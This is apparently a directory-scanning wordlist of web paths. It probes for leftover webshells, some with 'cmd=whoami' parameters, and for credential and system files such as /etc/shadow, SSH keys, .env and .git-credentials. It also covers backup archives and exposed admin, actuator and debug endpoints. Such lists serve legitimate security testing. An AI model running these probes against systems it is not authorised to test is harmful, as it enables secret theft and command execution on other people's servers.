".t.jsp
./servlet/Cat?pwd=023&cmd=whoami
.1ndex.jsp
.46_o01561023045980.jsp
.46_sjn4gwl3l191.jsp
.51pwn_com.jsp
.51pwn_com.jsp?51pwn_comw=1
.51pwn_com.jsp?pass=1
.O01551922179807.jsp
.O01556091894819.jsp
.O01556092210000.jsp
.O01556093257679.jsp
.O01556263567793.jsp
.O01556264030888.jsp
.O01556264136120.jsp
.O01557456322225.jsp
.O01559613812556.jsp
.O01559614084321.jsp
.O01559614476564.jsp
.O01559614653542.jsp
.O01560828065583.jsp
.O01560828121473.jsp
.O01560960439677.jsp?cmd=whoami&ls=whoami
.O01561023045980.jsp
.O01561023045980.jsp?cmd=whoami&ls=whoami
.O015610230459up.jsp
.UnoThis.jsp
.UnoThis.jsp?cmd=whoami
.Xt01.jsp
.Xt01404.png
.Xt01755.jsp
._.jsp
._com.jsp
.bak.jsp
.beamarker.dat.jsp
.index.jsp
.jsp/WEB-INF/classes/Env.java?cmd=whoami&ls=whoami
.k8Jn4gWlqX2c592.jsp
.mtx.jsp
.mtx.jsp?cmd=whoami
.o01561023045980.jsp
.s8Jn4gWlqX2c5.jsp?cmd=whoami
.s8Jn4gWlqX2c59.jsp
.s8Jn4gWlqX2c592.jsp
.sJn4gWl3l11.jsp
.sJn4gWl3l113.jsp
.sJn4gWl3l1149.jsp
.sJn4gWl3l115.jsp
.sJn4gWl3l118.jsp
.sJn4gWl3l1198.jsp
.sJn4gWl3l1221.jsp
.sJn4gWl3l1225.jsp
.sJn4gWl3l1286.jsp
.sJn4gWl3l1309.jsp
.sJn4gWl3l148.jsp
.sJn4gWl3l1482.jsp
.sJn4gWl3l1640.jsp
.sJn4gWl3l1663.jsp
.sJn4gWl3l1665.jsp
.sJn4gWl3l1691.jsp
.sJn4gWl3l1706.jsp
.sJn4gWl3l1710.jsp
.sJn4gWl3l1870.jsp
.sJn4gWl3l1887.jsp
.sJn4gWl3l191.jsp
.sJn4gWl3l1932.jsp
.sJn4gWl3l1970.jsp
.sJn4gWlqX1c592.jsp
.sJn4gWlqX1c592.jsp?cmd=whoami
.shell.jsp
.shell.jsp?cmd=whoami
.shell.jspx
.shell123.jsp
.sjn4gwl3l191.jsp
.test.jsp
.text2.jsp
.tj.jsp
.tunnel.jsp
.w.jsp
.x3_t.jsp
.x4.jsp
/..;
/.DS_Store
/.bash_history
/.bash_logout
/.bash_profile
/.bashrc
/.config.inc.php.swp
/.config.php.swp
/.credentials
/.database.php.swp
/.db.php.swp
/.docker/config.json
/.dockercfg
/.env
/.env.example
/.esmtprc
/.ftpconfig
/.git-credentials
/.git/HEAD
/.git/config
/.git/index
/.gitattributes
/.gitignore
/.gitlab-ci.yml
/.history
/.htaccess
/.htaccess.bak
/.htpasswd
/.htpasswd.bak
/.idea/WebServers.xml
/.idea/modules.xml
/.idea/workspace.xml
/.index.php.swp
/.key
/.keys.yml
/.mysql.php.swp
/.mysql_history
/.netrc
/.npmrc
/.pgpass
/.rediscli_history
/.remote-sync.json
/.s3cfg
/.secret
/.secret_key
/.settings.php.swp
/.ssh/authorized_keys
/.ssh/id_dsa
/.ssh/id_dsa.pub
/.ssh/id_rsa
/.ssh/id_rsa.pub
/.ssh/known_hosts
/.svn
/.svn/entries
/.travis.yml
/.tugboat
/.user.ini
/.vimrc
/.vscode/sftp.json
/.well-known/apple-app-site-association
/.well-known/security.txt
/.wp-config.php.swp
/1.7z
/1.asp
/1.aspx
/1.gz
/1.htaccess
/1.htpasswd
/1.jsp
/1.jspx
/1.php
/1.rar
/1.sql
/1.tar.bz2
/1.tar.gz
/1.tgz
/1.txt
/1.zip
/123.php
/123.txt
/2
/2.jsp
/2.php
/2.sql
/2.txt
/22.php
/Admin/Login
/Adminer
/Application.rar
/Application.tar
/Application.tar.gz
/Application.zip
/Application/Runtime/common~runtime.php
/CHANGELOG
/CHANGELOG.md
/CONTRIBUTING
/CONTRIBUTING.md
/CONTRIBUTING.txt
/Common.yml
/Conf
/Config.yml
/Connections.yml
/Controls/Ueditor/
/DataBackup
/Debug.yml
/Dockerfile
/FCKeditor/editor/filemanager/connectors/asp/connector.asp
/Fckeditor
/Gruntfile.js
/Help
/INSTALL
/INSTALL.md
/INSTALL.txt
/JavaMelody
/Jdbc.yml
/LICENSE
/LICENSE.md
/Login.aspx
/Public/ueditor/php/config.json
/README
/README.md
/Runtime
/Runtime.rar
/Runtime.tar
/Runtime.tar.gz
/Runtime.zip
/Runtime/Logs/
/Search-Replace-DB-master/
/Search-Replace-DB/
/Server.yml
/Systems/
/Trace.axd
/UPDATE.txt
/UPGRADE
/UPGRADE.txt
/UpgradeLog.XML
/Upload
/UploadFile
/Uploadify/uploadify.swf
/WEB-INF.tar
/WEB-INF.tar.gz
/WEB-INF.war
/WEB-INF.zip
/WEB-INF/web.xml
/WS_FTP.log
/WSsamples
/WebReport/ReportServer
/Wiki.jsp
/XSQLConfig.xml
/_admin
/_async/AsyncResponseService
/_async/AsyncResponseServiceSoap12
/_async/index7833.jsp
/_async/x3.jsp
/_cat/
/_cat/indices
/_config
/_legacy
/_mapping
/_phpmyadmin/index.php
/a.7z
/a.gz
/a.out
/a.php
/a.rar
/a.tar.bz2
/a.tar.gz
/a.tgz
/a.zip
/aa.php
/access-log
/access-log.1
/access.1
/access.log
/activeMQ/
/activemq
/activity
/actuator
/actuator/archaius
/actuator/auditevents
/actuator/autoconfig
/actuator/beans
/actuator/bindings
/actuator/caches
/actuator/channels
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/env.json
/actuator/gateway/globalfilters
/actuator/gateway/routefilters
/actuator/gateway/routes
/actuator/health
/actuator/health.json
/actuator/heapdump
/actuator/httptrace
/actuator/hystrix.stream
/actuator/info
/actuator/integrationgraph
/actuator/jolokia
/actuator/jolokia/list
/actuator/loggers
/actuator/mappings
/actuator/metrics
/actuator/routes
/actuator/scheduledtasks
/actuator/service-registry
/actuator/threaddump
/admin
/admin-console
/admin-console/login.seam
/admin.7z
/admin.asp
/admin.aspx
/admin.do
/admin.gz
/admin.html
/admin.jsp
/admin.php
/admin.rar
/admin.sql
/admin.tar.bz2
/admin.tar.gz
/admin.tgz
/admin.zip
/admin/
/admin/Login.aspx
/admin/Register.aspx
/admin/admin
/admin/adminLogin.do
/admin/adminer.php
/admin/checkLogin.do
/admin/cores
/admin/env
/admin/heapdump
/admin/index.do
/admin/login.do
/admin/menu
/admin/server-status
/adminLogin.do
/adminer.php
/adminer.sql
/administrator
/airflow
/alertmanager
/altair
/ansible
/antx.properties
/api
/api-doc
/api-docs
/api.html
/api.json
/api.php
/api.tar
/api.tar.gz
/api.zip
/api/actuator/env
/api/batch
/api/config
/api/contents
/api/dev/applications
/api/dev/services
/api/env
/api/graph
/api/health
/api/host
/api/incidents
/api/incidents/events
/api/incidents/open
/api/payment?id=
/api/prod/services
/api/proxy
/api/proxy?url=
/api/saved_objects/_find?type=index-pattern&per_page=100
/api/search
/api/sessions
/api/spaces/space
/api/status
/api/swagger-ui.html
/api/swagger.yml
/api/upload
/api/user
/api/users
/api/v1/
/api/v1/api-docs
/api/v1/node
/api/v1/pod
/api/v1/pods
/api/v1/proxy/namespaces
/api/v1/proxy/nodes
/api/v2/api-docs
/api/v4/users/1
/api/v4/users/2
/apizza/
/apollo
/app.cfg
/app.ini
/app.js
/app.log
/app/.git/config
/app/.git/index
/app/kibana
/app/timelion
/application.ini
/application.properties
/application.wadl
/application.yml
/application/config/application.ini
/application/config/config.ini
/application/configs/application.ini
/applicationContext.xml
/applications.html
/archaius
/archery
/aspxspy.aspx
/auditevents
/auth/login
/auth/login/sentry/
/autoconfig
/axis/
/axis2
/axis2/
/axis2/axis2-admin/login
/b.php
/back.tar.bz2
/backup
/backup.7z
/backup.gz
/backup.rar
/backup.sh
/backup.sql
/backup.sql.gz
/backup.tar.bz2
/backup.tar.gz
/backup.tgz
/backup.zip
/bbs
/bbs.tar
/bbs.tar.gz
/bea_wls_internal/classes/mejb@/org/omg/stub/javax/management/j2ee/_ManagementHome_Stub.class
/bea_wls_internal/index7833.jsp
/bea_wls_internal/x3.jsp
/beans
/bin.rar
/bin.zip
/bin/config.sh
/bootstrap.properties
/bootstrap.yml
/bower_components/underscore/README.md
/bshservlet
/bshservlet-wbsh
/bug
/bugfree
/build.gradle
/build.tar.gz
/build.xml
/caches
/cacti
/cacti/
/cacti/cacti.sql
/cas
/casServer
/cert-key.pem
/cgi-bin/test-cgi
/changelog.txt
/charts
/checkLogin.do
/classes.war
/cleanup.log
/cloudstore/config/mysql.xml
/cm.php
/code.tar.gz
/codeception.yml
/common/m_intl_common_header/gulpfile.js
/composer.json
/composer.lock
/conditions
/conf.ini
/conf.tar.gz
/conf/application.ini
/conf/conf.zip
/conf/config.ini
/conf/email.ini
/conf/fastcgi.conf
/conf/jdbc.properties
/conf/nginx.conf
/config
/config.gz
/config.inc
/config.inc.php.bak
/config.ini
/config.js
/config.json
/config.php
/config.php.bak
/config.php~
/config.properties
/config.rb
/config.sh
/config.tar
/config.tar.gz
/config.zip
/config/.config.php.swp
/config/.config_global.php.swp
/config/application.ini
/config/config.inc
/config/config.ini
/config/config.php
/config/config_global.php.bak
/config/database.yml
/config/master.key
/configprops
/configs/application.ini
/configuration.ini
/conn.yml
/connect.yml
/console/
/console/login/LoginForm.jsp
/consul
/containerLogs/
/containers/json
/core
/cpanel
/credentials
/credentials.xml
/cri
/css.asp
/customers.log
/dama.asp
/dama.aspx
/dama.jsp
/dama.jspx
/dama.php
/dashboard.php
/dashboard/
/data.7z
/data.gz
/data.log
/data.rar
/data.sql
/data.tar
/data.tar.bz2
/data.tar.gz
/data.tgz
/data.txt
/data.zip
/data/
/data/admin/ver.txt
/database
/database.7z
/database.gz
/database.log
/database.properties
/database.rar
/database.sql
/database.sql.gz
/database.tar.bz2
/database.tar.gz
/database.tgz
/database.yml
/database.zip
/database_config.properties
/datasource.html
/datasource.yml
/db.7z
/db.conf
/db.gz
/db.inc
/db.ini
/db.log
/db.php.bak
/db.properties
/db.rar
/db.sql
/db.sql.gz
/db.sqlite
/db.sqlite3
/db.tar.bz2
/db.tar.gz
/db.tgz
/db.yaml
/db.yml
/db.zip
/dbaccess.log
/dbeaver-data-sources.xml
/debug
/debug.log
/debug.php
/debug.txt
/debug/flags/v
/debug/metrics
/debug/pprof/
/debug/vars
/default1.aspx
/demo
/deploy.sh
/deploy.tar.gz
/deployment-config.json
/descriptor
/dev
/dev.html
/dev/applications
/dev/services
/dfshealth.html
/dist
/dist.zip
/doc/page/login.asp
/docker
/docker/Dockerfile
/docs
/docs.html
/docs.json
/docs.tar
/docs.zip
/download
/druid/index.html
/druid/sql.json
/druid/websession.json
/dubbo
/dump
/dump.sql
/dump.sql.gz
/dwr
/dwr/index.html
/eapdomain/imageupload.do
/eapdomain/portal/images/uploadimage.jsp
/eapdomain/portal/survey/admin/SurveyStatisShow.jsp?sid=333
/eapdomain/portal/webpages/web/images/FileName.jsp
/eapdomain/portal/webpages/web/images/wooyun.jsp
/eapdomain/upSample1Action.do
/ecdomain/imageupload.do
/ecdomain/portal/images/uploadimage.jsp
/ecdomain/portal/survey/admin/SurveyStatisShow.jsp?sid=333
/ecdomain/portal/webpages/web/images/FileName.jsp
/ecdomain/portal/webpages/web/images/wooyun.jsp
/ecdomain/upSample1Action.do
/edit
/ehcache
/elasticsearch
/elk
/elmah.axd
/env
/env.json
/env.sh
/env/
/envs
/error.log
/errors.log
/es
/etc/fstab
/etc/hosts
/etc/passwd
/etc/shadow
/eureka-client/
/eureka-server/
/eureka/
/eurekaServer/
/eval
/example.html
/examples/
/examples/index.html
/examples/servlets/servlet/SessionExample
/explore/
/explore/projects
/explorer.html
/fetch
/fileServer
/filezilla.xml
/filezilla/filezilla.xml
/filezilla/recentservers.xml
/fisheye
/flex2gateway/amf
/flyway
/ftp.7z
/ftp.gz
/ftp.rar
/ftp.tar.bz2
/ftp.tar.gz
/ftp.tgz
/ftp.zip
/fuck.php
/ganglia/
/gateway/globalfilters
/gateway/routefilters
/gateway/routes
/gitlab/
/goroutine
/grafana/
/graph
/graphiql
/graphql
/graphql-explorer
/graphql/console
/gulpfile.js
/handling/v1/
/handling/v1/incidents
/health
/healthz
/heapdump
/help/sys/help.html
/heroku.json
/historys.html
/hive
/host
/hosts.html
/htdocs.tar.gz
/htpasswd.bak
/httpd.conf
/httptrace
/hub
/hystrix.stream
/i.php
/ibm/console/logon.jsp
/id_dsa
/id_rsa
/id_rsa.pub
/img/list.jsp
/incidents
/index.7z
/index.bak
/index.cgi.bak
/index.gz
/index.php.bak
/index.php~
/index.rar
/index.tar.bz2
/index.tar.gz
/index.tgz
/index.zip
/info
/init
/init.bat
/install.php
/install.sh
/install.tar.gz
/intergrationgraph
/invokeState
/istio
/item/admin
/iur/
/java
/java/
/jdbc.properties
/jeeadmin/jeebbs/index.do
/jeeadmin/jeecms/index.do
/jenkins.yml
/jenkins/
/jenkins/script
/jmx
/jmx-console/
/jmx-console/HtmlAdaptor
/job/indxe.jsp
/jolokia
/jolokia/list
/js/Gruntfile.js
/js/Uploadify.js
/js/extjs/examples/feed-viewer/view.html
/js/extjs/examples/index.html
/json/list
/jspspy.jsp
/jspspy.jspx
/jsrpc.php
/k8s
/key
/key.txt
/keys
/kiali
/kibana
/kube
/kubernetes
/laravel5.sql
/license.txt
/liquibase
/log.html
/log.log
/log/access.log
/log/error.log
/log/www-error.log
/log4j.properties
/logfile
/loggers
/logging
/login
/login/Login.jsp
/login/login
/logins.json
/logs
/logs.tar
/logs.tar.gz
/logs.zip
/logs/
/logs/access.log
/logs/error.log
/logs/liferay.log
/logs/login.log
/logs/www-error.log
/maintenance
/manage
/manage/heapdump
/manage/login.htm
/management
/management/env
/management/heapdump
/manager
/manager.aspx
/manager.do
/manager.jsp
/manager.jspx
/manager.php
/manager.tar
/manager.tar.gz
/manager.zip
/manager/html
/manifest.json
/mappings
/mappings.json
/master.key
/memadmin/index.php
/members.log
/memory
/messagebroker/amf
/metric
/metrics
/metrics/
/metrics/probes
/mobile
/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333
/mongoid.yml
/monitor
/monitoring
/mw-config/
/myadmin/login.php
/nacos/
/nagios
/nginx.conf
/nginx_status
/nohup.out
/nomad
/npm-debug.log
/o.tar.gz
/oa
/old
/old.7z
/old.gz
/old.rar
/old.tar.bz2
/old.tar.gz
/old.tgz
/old.zip
/onealert
/ooxx.asp
/ooxx.aspx
/ooxx.jsp
/ooxx.jspx
/ooxx.php
/orders.log
/out
/output.tar.gz
/owipav
/p.php
/package-lock.json
/package.7z
/package.gz
/package.json
/package.rar
/package.tar.bz2
/package.tar.gz
/package.tgz
/package.zip
/panabit
/persistence.xml
/php-fpm/error.log
/php-fpm/www-error.log
/php.ini
/php.php
/phpMyAdmin/setup/
/phpinfo.php
/phpmyadmin
/phpmyadmin/index.php
/phpspy.php
/phpunit.xml
/pigoss
/plugin/tools/tools.php
/plugins/servlet/oauth/users/icon-uri
/plus/90sec.php
/pm2.json
/pma/index.php
/pms
/pods
/pom.xml
/pprof
/printenv
/process.bak
/prod/services
/production.js
/profile
/proftpdpasswd
/project.properties
/project/details/swagger-ui.html
/prometheus
/properties
/proxy
/proxy.pac
/public/README.md
/query?q=SHOW%20STATS
/read
/read_file
/readfile
/readme.html
/readme.txt
/recentservers.xml
/redmine
/refresh
/requirements.txt
/resin-admin/
/resin-admin/index.php
/resin-status
/resin.tar
/resin.tar.gz
/resin.zip
/resource.gz
/resources/Gruntfile.js
/resources/js/ueditor/
/rest/swagger.json
/robomongo.json
/routes
/rs-status
/rsync.sh
/run.sh
/runningpods/
/s.asp
/s.aspx
/s.jsp
/s.jspx
/s.php
/s/README.md
/sales.log
/salesforce.js
/scheduledtasks
/secret
/secret_key
/secrets.yml
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ConfigureReport.jspa
/secure/Dashboard.jspa
/secure/ManageFilters.jspa?filterView=popular
/secure/attachmentzip/
/secure/popups/UserPickerBrowser.jspa
/security.properties
/seeyon/
/seeyon/logs/login.log
/seeyon/services
/seeyonreport/ReportServer
/server-info
/server-status
/server.cfg
/server.log
/serverinfo/
/service-registry
/service/rest/swagger.json
/service/siesta/swagger.json
/services
/services/
/servlet/PrintSetupServlet
/sessions
/settings.ini
/setup.php
/setup.sh
/sftp-config.json
/sftp.json
/shell.asp
/shell.aspx
/shell.jsp
/shell.jspx
/shell.php
/shutdown
/siesta/swagger.json
/signin
/site.tar.gz
/smartbi/vision/index.jsp
/sms
/socker.io
/socket
/sofa-config.properties
/solr
/solr/
/solr/admin/cores
/solr/admin/cores?wt=json
/solr/admin/info/system
/solr/x3.jsp
/spec/
/splunk
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/sql.7z
/sql.gz
/sql.html
/sql.log
/sql.rar
/sql.tar.bz2
/sql.tar.gz
/sql.tgz
/sql.yml
/sql.zip
/sqlnet.log
/src.rar
/src.tar
/src.tar.gz
/src.zip
/src/conf/application.ini
/sso/swagger-ui.html
/sso/v2/api-docs
/stat
/static/lib/ueditor/
/static/lv2/README.md
/static/videoui/README.md
/statics/ueditor/
/statistics
/stats
/stats/
/stats/container
/status
/status2
/storage/logs/laravel.log
/sw/swagger-ui.html
/swagger-resources
/swagger-ui
/swagger-ui.html
/swagger-ui/index.html
/swagger.json
/swagger/docs/v1
/swagger/docs/v2
/swagger/ui/index
/sync.sh
/sys
/sysinfo/envs
/sysinfo/logs
/system.html
/system.log
/temp.7z
/temp.gz
/temp.rar
/temp.tar.bz2
/temp.tar.gz
/temp.tgz
/temp.txt
/temp.zip
/temp/
/template/swagger-ui.html
/test
/test.7z
/test.asp
/test.aspx
/test.gz
/test.htm
/test.html
/test.js
/test.jsp
/test.jspx
/test.log
/test.php
/test.rar
/test.sh
/test.sql
/test.tar.bz2
/test.tar.gz
/test.tgz
/test.txt
/test.zip
/test0.php
/test1
/test1.php
/test123.php
/test123321/index123.jsp
/test123321/test12345.jsp
/test_ip.php
/testing
/testproxy.php
/think.config
/threadTime
/threaddump
/threads
/tmp
/tmp.7z
/tmp.gz
/tmp.rar
/tmp.tar.bz2
/tmp.tar.gz
/tmp.tgz
/tmp.txt
/tmp.zip
/tmp/2.php
/tmp/access.log
/tmp/access_log
/tmp/admin.php
/tools.php
/tools.tar.gz
/tools/tools.php
/trace
/tracing
/turbine.stream
/tz.php
/uc_server.tar.gz
/uc_server.zip
/uc_server/data/.config.inc.php.swp
/uc_server/data/config.inc.php.bak
/uc_server/uctools.php
/ucbrowser/test.php
/uddiexplorer/SearchPublicRegistries.jsp
/uddiexplorer/index7833.jsp
/uddiexplorer/x3.jsp
/ueditor/
/ueditor/jsp/config.json
/ueditor/net/config.json
/ueditor/php/config.json
/up.php
/update
/update.php
/updates
/upfile
/upfile.asp
/upfile.aspx
/upfile.do
/upfile.html
/upfile.jsp
/upfile.php
/upgrade.aspx
/upgrade.php
/upgrade.readme
/upload.7z
/upload.asp
/upload.aspx
/upload.do
/upload.gz
/upload.html
/upload.jsp
/upload.php
/upload.rar
/upload.sh
/upload.tar.bz2
/upload.tar.gz
/upload.tgz
/upload.zip
/upload/
/uploads
/uploads/dump.sql
/user-login.html
/users.log
/users/sign_in
/v1/health/service/consul
/v1/swagger
/v2/api-docs
/v2/apps
/v2/groups
/v2/keys/
/v2/keys/?recursive=true
/v2/swagger
/v2/swagger.json
/vendor/composer/LICENSE
/vendor/phpunit/phpunit/LICENSE
/vendor/phpunit/phpunit/README.md
/ventrilo_srv.ini
/version
/vision/index.jsp
/vpn/index.html
/vulnspy.php
/wdcp
/weaver/bsh.servlet.BshServlet
/web
/web-console/
/web.7z
/web.config
/web.gz
/web.properties
/web.rar
/web.tar
/web.tar.bz2
/web.tar.gz
/web.tgz
/web.war
/web.xml
/web.zip
/web/index1.jsp
/webapps.war
/webmin
/webroot.zip
/webserver.tar.gz
/webservice
/webshell.asp
/webshell.aspx
/webshell.jsp
/webshell.jspx
/webshell.php
/website.7z
/website.gz
/website.rar
/website.tar.bz2
/website.tar.gz
/website.tgz
/website.war
/website.zip
/weixin.rar
/weixin.tar.gz
/weixin.zip
/wfweb
/wiki
/wls-wsat
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/index7833.jsp
/wls-wsat/x3.jsp
/workflow
/wp-config.php.bak
/wp-content/debug.log
/wp-content/uploads/dump.sql
/wp-json/
/wp-json/wp/v2/users
/wp-login.php
/ws
/ws/v1/cluster/apps
/ws_utc
/ws_utc/begin.do
/ws_utc/config.do
/ws_utc/resources/setting/options/general
/wsadmin.traceout
/wsadmin.valout
/wsadminListener.out
/wsman
/wstats
/www-error.log
/www.7z
/www.gz
/www.log
/www.rar
/www.tar
/www.tar.bz2
/www.tar.gz
/www.tgz
/www.war
/www.zip
/wwwroot.7z
/wwwroot.gz
/wwwroot.rar
/wwwroot.tar
/wwwroot.tar.bz2
/wwwroot.tar.gz
/wwwroot.tgz
/wwwroot.war
/wwwroot.zip
/wwwstats.htm
/x.asp
/x.aspx
/x.jsp
/x.jspx
/x.php
/x.tar.gz
/xampp/phpmyadmin/scripts/setup.php
/xd.php
/xferlog
/xlogin/
/xls/
/xml/_common.xml
/xml/common.xml
/xmlrpc.php
/xmlrpc_server.php
/xphpMyAdmin/
/xphperrors.log
/xsl/_common.xsl
/xsl/common.xsl
/xslt/
/xsql/
/xxl
/xxl-job
/xxl-job-admin
/xxlcof
/xxljob
/yaml.log
/yaml_cron.log
/yapi/
/yarn-debug.log
/yarn-error.log
/yii
/yii.bat
/yum.log
/zabbix/
/zabbix/jsrpc.php
/zabbix/setup.php
/zebra.conf
/zehir.php
/zentao
/zentao/
/zeusQuartz.properties
/zf_backend.php
/zimbra/
/zipkin
000.jsp
0000.jsp
0098e0be088433955fa05a1717f360538112339e.jsp
00c86bf6ce026ccfaac955840d18391fbff5c933.jsp
013f24efa637d00962abc741457f51a4ee64354c.jsp
023.jsp
023.jspx
0317bd1d741350d9bc4adbf92801b6a109a57458.jsp
03231be47ca1ca2c31e54d037df6fde6041d9a27.jsp
032c141019ceabee44e013e27d7e77bc4995125a.jsp
03b48a3173a919b51278f38a88b7ef5aca4f7d59.jsp
0469aa92db9d69692fef21d502f879a7b2566718.jsp
094b96e84e01793e542f8d045af68da015a4a7fc.jsp
0bf6c1e069a14181eb642fa939a059efddc8c82e.jsp
0bxxl42slk.jsp
0d4b369f7cba724aaa4962caf463c5cfb915a141.jsp
0d980bb944a1021431fc0b2d805c5c31994ca486.jsp
1.jsp
102.jsp
108c5eeb85f9a2bfb896a1c42a00978f5770e195.jsp
11.jsp
111.jsp
1111.jsp
117eb7a7743d53e767129befd5d2458d1621b23b.jsp
1213db93b5e2fdc0a53d41674e7b1ea78876106c.jsp
123.jsp
12302.jsp
1234.jsp
123456.jsp
13.jsp
13ed85586d47c96d1630d4e5537cf10fde2d939e.jsp
1488207531.jsp
155c441e853b1c7e3e12b32f39fc30a5d577f818.jsp
1563593777216.jsp
1563595485310.jsp
1573435098159_x3.jsp
1577814153243_x3.jsp
1580984073485_x3.jsp
16238e86cf4e913c956dcf804bca86da2f2127f5.jsp
183df23142716d5d2fc0ea24bbeeb40eaa8b65c3.jsp
198577337426540c3f9ed6947bed89219774379f.jsp
19e30ccd0c4695c76a8d02259a446f109df6ba24.jsp
1_1.jsp
1_3.jsp
1a047f4bdf0334f58e23a77fb8190f74a864fffd.jsp
1a4a93233cf5418af85386b5899a634e5c2919b1.jsp
1e79cae19d42da5aa9813b16456971b4e3d34ac0.jsp
1ndex.jsp
1ogout.jsp
1ogout.jspx
2.jsp
201.jsp
20614d368b77c3af8dbc61e0bbe472e73fde40b3.jsp
22609061c167befd5c32b0798eb52e89d68c74ef.jsp
22cdab3507ae20c2cab0989a95a83ca6850114e3.jsp
22daf8a156bfb57697e03b4b16f09a743764a3f6.jsp
231.jsp
246c5e7641edc64246f012f7ec36b1568683528f.jsp
25fd4e24575c51600ddbd25479c773af2e17d73b.jsp
2637c0522970b6e02d040b305d6bc3826ef58eab.jsp
2640228cb6fb767a53615ca878898feb350139ca.jsp
27269b6fcff8ddc3c06322f1f9247d5af3ac6624.jsp
275da720a99ed21fd98953f9ddda7460e5b96e5f.jsp
28f0cad6197cce10791a400a28f611b8400a8aec.jsp
2F417.jsp
2Fx3.jsp
2a0ffc23374ef902dfb87bd3a5454b9a96e0d0be.jsp
2d0a76576f13c70a3d1a0d8d4e7453382adefdbc.jsp
2eae1d5632e22ac9da64bfdea30ed16876f08af5.jsp
2f7b4343c3b3387546d5ce5815048992beab4645.jsp
3.jsp
30cf4dccf67c46a6f100818d4d4141c0150b1281.jsp
30dae7c1473b767d44f8e30600891a524ac8dea0.jspx
30fc7ea6d4f7cde66043113e38213361621704b7.jsp
31df02361b7af1f74232e63664bf3ad7bf91e233.jsp
32008f2507fd97467849c1777516a25acfcb8f05.jsp
3211.jsp
321test2411up.jsp
321testk3ls.jsp
32c3066548f3254ab3d0bc1a3e78ebd774fcef4a.jsp
32ltest28.jsp
3593c50508dba517f8eae536688490e975f34fd7.jsp
362c4b8a2156b8fade4c83deffe464d1856cd763.jsp
36e91678f1e2887b5524cc7fdc8e6790aa4a378a.jsp
37c5e3f810293ab5a645947d3b8b9386c404ccf5.jsp
37ca8aec7ed07d8c6bdcfb2b97416745f7870f7e.jsp
3870b31f26975a7cb424eab6521fc9bffc2af580.jsp
38b48a655a53fec64c10fc119e46c443446d6b10.jsp
3b05dd031fdbebfa79614b0035c47052ac60b210.jsp
3b28aca8038c7f5362c1d8afbb23efcce86bd10c.jsp
3b46a756478928d13a492dd85b3c30f8ed75f037.jsp
3c546df74e37eff27ab1570241e24e1ace9e56e9.jsp
3e1cd375612c3bde5c4f01bb1839c41a442bca15.jsp
3e6a3482b9db64c2ebe61b23df8422756fce8182.jsp
3t3rN4L.jsp
400.jsp
402a5dfc90a7a750af6fc4fa96b5e63a105424c0.jsp
403.jsp
403403.jsp
404.jsp
417.jsp
41cf3b413baf202a88541419419e3cd7ea9ab999.jsp
43ca670ff08b88b84e7a98e562c80e12070b22dd.jsp
46_o01561023045980.jsp
4762f36ca01fb9cda2ab559623d2206f401fc0b1.jsp
48972f48f93f1cbdb0e4b95753da97ffdb58168f.jsp
4a45e4f7ca2bfb1d325d1cff8636d0ece29a4eed.jsp
4b3d36ec426fb0be788ba74a9de3cf22e9c62fde.jsp
4b622f46d5ed22e3b034b13b37cd1580d0c960e4.jsp
4c2464503237beba54f66f4a099e7e75028707aa.jsp
4c356d66708eda6004b08a99e97db7b239eafce7.jsp
4c496b2709989e0667ec04ffa3694d35dcda7306.jsp
4d58bcd197f2b63c8b93239da1da149d10f5cc12.jsp
4efa90145d62e21bfc37023580d455489ff1de37.jsp
51a25a3ec9633d02d856e910b3c48f8771d960aa.jsp
51pwn_com.jsp
51pwn_com.jsp?51pwn_com=1
51pwn_com.jsp?51pwn_comw=1
51pwn_com.jsp?pass=1
51pwn_com1.jsp
51test.jsp
520.jsp
5245173e6adf00979006ddc15710ed14366eec86.jsp
52bfc305a6e7e5daa318d664ecfdc19986fa5f4e.jsp
52ed07e55c6e6d640ffc2c6371c585ce063f6329.jsp
536d65c8be91fa1d709f4c5a91e1f446e0d250e9.jsp
53b38b2940917f3fb327d71f8aef2ef1d8ce4387.jsp
57a8da83b98e475c79f90c50696142f713244e1e.jsp
583231786bc1d0ecca7d8d2b083804736a3f0a32.jsp
5a52c7ae56830013707cd5ce5fe01614e6c2daf9.jsp
5a9fdaa5ac254828974d0cd1e95d0a7f431e2c72.jsp
5e241d9d3a045d3ade7b6ff6af6c57b149fa356e.jsp
5f101042f718ec10bb60633b7dd61d7b751f1260.jsp
5fabc956f2030f24d1ab2e2fa9c5c95cc301fbc1.jsp
5fd522e996b9858d2913c55ad4e7c374824d4e82.jsp
5ff6df3eb3c25a5e9fc0ea598c0ab85db6512f41.jspx
60ccccb207dad4fb29648cb2bf19542d89171851.jsp
6121bd4faf3aa1f13ac99df8f6030041ca9d3cc3.jsp
61a9e9eb6b24b46b170f421b1ee358f6a92bcbde.jsp
61ce175758d665502a2f8f24d85537bf415eba84.jsp
61d0434c0ba2bb815a20c5878f9c1ee672b9f61e.jspx
650eaa21f4031d7da591ebb68e9fc5ce5c860689.jsp
6647a2558627cdaa2b04f157f3dd33e7838fdd3c.jspx
6744f627f43f81dbc1a1a682ab3e02a2e50ee682.jspx
6888.jsp
689d37bb3f27d2ccea596906248c477f3c880f89.jsp
68fe4d31b82f416fb2d3a32f1cc179060096e8a5.jsp
6cf0f458ae8faaabc449509d69531450b2067f3b.jsp
6d965191607e37758232050b5b44ae9380cf9593.jsp
6dd02cccd06d2f442958c0aabdd100260a1c1304.jsp
70c3d62344418d4745bd5047ecadfd89271305d6.jsp
70dcd8a49a4e7f529098dadfd2d172b692cd5c93.jspx
73bb9a1933da055f3925d91c02b5dc4bd3c83a07.jsp
74cc6ab5a85b1ce4fb8c082690833a87209ed9ed.jsp
7509ee0248c4c10ed12568e1ba9265ebb2e7d8ad.jsp
7628589fcf7bf32067e67f5637445defad71302d.jsp
769e3797df6ab8fffd2cc631aaa68a89e228602f.jsp
77110bad5de094ad8416b264937698ba2f767771.jsp
79e5206d86bee52d8239a732107c9d7fe7779676.jsp
7bcd44594e89bc0e0bdff33c20622316f8490305.jsp
7c0cc71e28f6bab535f516ff035a0c1117261801.jsp
7cefe48970e53d5451f0c01ac7feee0a91956805.jsp
7dbbb7614c1d7ba0ed11277061aad64aa93a283c.jsp
7de0f7d7b1db6158355f17e4c5e4a1be0d2c6e0f.jsp
7e3545b63eead01a8f509cdd5304e78d6ae1a047.jsp
